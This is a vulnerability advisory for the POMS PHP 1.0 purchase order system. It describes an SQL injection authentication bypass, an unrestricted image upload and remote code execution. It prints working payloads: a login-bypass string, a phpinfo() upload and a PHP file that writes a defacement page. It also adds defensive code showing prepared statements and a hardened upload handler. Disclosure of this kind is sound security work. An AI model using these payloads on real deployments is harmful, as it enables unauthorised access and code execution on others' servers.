Published on May 10th, 2024

POMS PHP 1.0 SQL Injection / Shell Upload – Torchsec

## Title: POMS-PHP-(by oretnom23)-v1.0-FU-SQLi-RCE-HAT.TRICK
1. SQLi Bypass Authentication
2. File Upload
3. RCE
## Latest update from the vendor: 5 hours 32 minutes ago
## Author: nu11secur1ty
## Date: 05/07/2024
## Vendor: https://github.com/oretnom23
## Software:
https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
## References:
https://portswigger.net/web-security/sql-injection
https://portswigger.net/web-security/file-upload
https://portswigger.net/web-security/authentication

## Description:
SQLi-Bypass-Authentication:
The username parameter of the login form is not sanitized before it is used
in the login query, so an attacker can inject SQL, bypass authentication and
log into the system.

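To show why the payload `nu11secur1ty' or 1=1#` from the Exploits section logs the attacker in, here is an added example (not POMS-PHP's own code) that models the login pattern the advisory describes, a username concatenated into the SQL query, next to a prepared-statement version. The table name `users`, the column names, the md5() password scheme and the connection details are assumptions, not taken from the project.

```php
<?php
// Added example, not code from POMS-PHP. It models the login pattern the
// advisory describes (the username parameter concatenated into the SQL
// query) next to a fixed version. The table name `users`, the column names
// and the md5() password scheme are assumptions, not taken from the project.

// Vulnerable pattern: $username is interpolated into the query text.
// With the advisory's payload  nu11secur1ty' or 1=1#  the WHERE clause
// becomes
//   username = 'nu11secur1ty' or 1=1#' AND password = '<md5>'
// MySQL treats everything after # as a comment, so the password check is
// cut off, `or 1=1` matches every row, and the first row of the table
// (usually the first account created) is returned as the logged-in user.
function login_vulnerable(mysqli $db, string $username, string $password): ?array
{
    $sql = "SELECT id, username FROM users "
         . "WHERE username = '" . $username . "' "
         . "AND password = '" . md5($password) . "'";
    $result = $db->query($sql);
    if ($result === false) {
        return null;
    }
    return $result->fetch_assoc() ?: null;
}

// Hardened pattern: a prepared statement sends the query text and the value
// separately, so quotes and comment markers inside $username are data and
// cannot change the statement. The password is checked against a salted
// hash created with password_hash() (assumed `password_hash` column),
// which replaces the unsalted md5() comparison.
function login_safe(mysqli $db, string $username, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT id, username, password_hash FROM users WHERE username = ?'
    );
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if (!$row || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    unset($row['password_hash']);
    return $row;
}

// Placeholder connection details (assumed).
$db = new mysqli('127.0.0.1', 'poms', 'secret', 'poms_db');
$payload = "nu11secur1ty' or 1=1#";

var_dump(login_vulnerable($db, $payload, 'wrong-password'));
var_dump(login_safe($db, $payload, 'wrong-password'));
```

Against a database with at least one user, the vulnerable function returns a user row for the payload even though the password is wrong, while the prepared-statement version looks for a user whose literal name is `nu11secur1ty' or 1=1#`, finds none, and returns null. Escaping the username with `mysqli_real_escape_string()` would also stop this particular payload, but binding parameters removes the whole class of bug rather than one string.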
---------------------------------------------------------------------------------------------------------------------------------------
FU:
The file upload parameter with id="cimg" is not validated securely, so an
attacker can upload an arbitrary PHP file to the server.
STATUS: CRITICAL vulnerability

---------------------------------------------------------------------------------------------------------------------------------------
RCE:
Because the uploaded PHP file is executed by the web server when it is
requested, the attacker can upload a file with malicious content and run it;
the proof of concept below uses it to create another file on the server.
STATUS: CRITICAL vulnerability

[+]Exploits:
- SQLi bypass authentication:
```mysql
nu11secur1ty' or 1=1#
```

- FU (uploaded as a .php file; the opening tag is required for the file to run):
```php
<?php
phpinfo();
?>
```

- RCE (uploaded PHP file that writes another file on the server when it is requested):
```php
<?php
// by nu11secur1ty - 2023
$fh = fopen('test.html', 'a');
fwrite($fh, '

Hello, you are hacked by Fileupload and RCE!

');
fclose($fh);
//unlink('test.html');
?>
```
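The FU and RCE findings above come down to one handler: the file from the cimg field is stored with whatever name and extension the client chose, in a directory the web server executes PHP from, so the phpinfo() and file-writing payloads run on the next request. The following added example (not POMS-PHP's own code) contrasts that weak pattern with a hardened upload handler. The POST field name `cimg`, the directory paths and the function names are assumptions.

```php
<?php
// Added example, not code from POMS-PHP. It contrasts an upload handler with
// the weakness the advisory describes (the cimg file field is accepted
// without validation, so a .php file ends up in a web-served directory and
// runs when requested) with a hardened handler. The POST field name 'cimg',
// the directory paths and the function names are assumptions.

// Weak pattern: keeps the client-supplied filename and extension and writes
// it under the document root. An upload named shell.php containing a
// phpinfo() call or the file-writing payload above is then executed by a
// request to /uploads/shell.php.
function save_image_weak(array $file, string $webroot): string
{
    $dest = $webroot . '/uploads/' . $file['name'];
    move_uploaded_file($file['tmp_name'], $dest);
    return $dest;
}

// Hardened pattern: validate on the server, throw away the original name,
// force the extension from the sniffed type, and store outside the
// document root so nothing uploaded can be executed by the web server.
function save_image_safe(array $file, string $storageDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed or not an uploaded file');
    }
    if ($file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('file larger than 2 MiB');
    }

    // Sniff the content; never trust $file['type'] or $file['name'].
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('unsupported content type: ' . $mime);
    }
    // Independent check that the bytes parse as an image. A polyglot can
    // pass both checks, which is why the name, extension and location
    // below do not depend on anything the client sent.
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('file is not a valid image');
    }

    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($storageDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($dest, 0644);
    return $name;   // store this name in the database, not a path
}

// Assumed call site: $storageDir is outside the web root; a separate
// download script reads the file by name and sets the Content-Type.
if (isset($_FILES['cimg'])) {
    try {
        $stored = save_image_safe($_FILES['cimg'], __DIR__ . '/../private_uploads');
        echo 'stored as ' . htmlspecialchars($stored);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'upload rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```

With the hardened handler the phpinfo() payload is rejected at the MIME check, and a payload disguised with a valid image header still lands as a random `.png`/`.jpg`/`.gif` name in a directory the web server never executes from, so neither phpinfo() nor the fopen()/fwrite() sequence above ever runs. If uploads must live under the document root, the directory additionally needs PHP execution disabled in the web server configuration.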

## Reproduce:
[href](https://www.patreon.com/posts/poms-php-by-v1-0-103786653)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/05/poms-php-by-oretnom23-v10-fu-sqli-rce.html)

## Time spent:
00:35:00
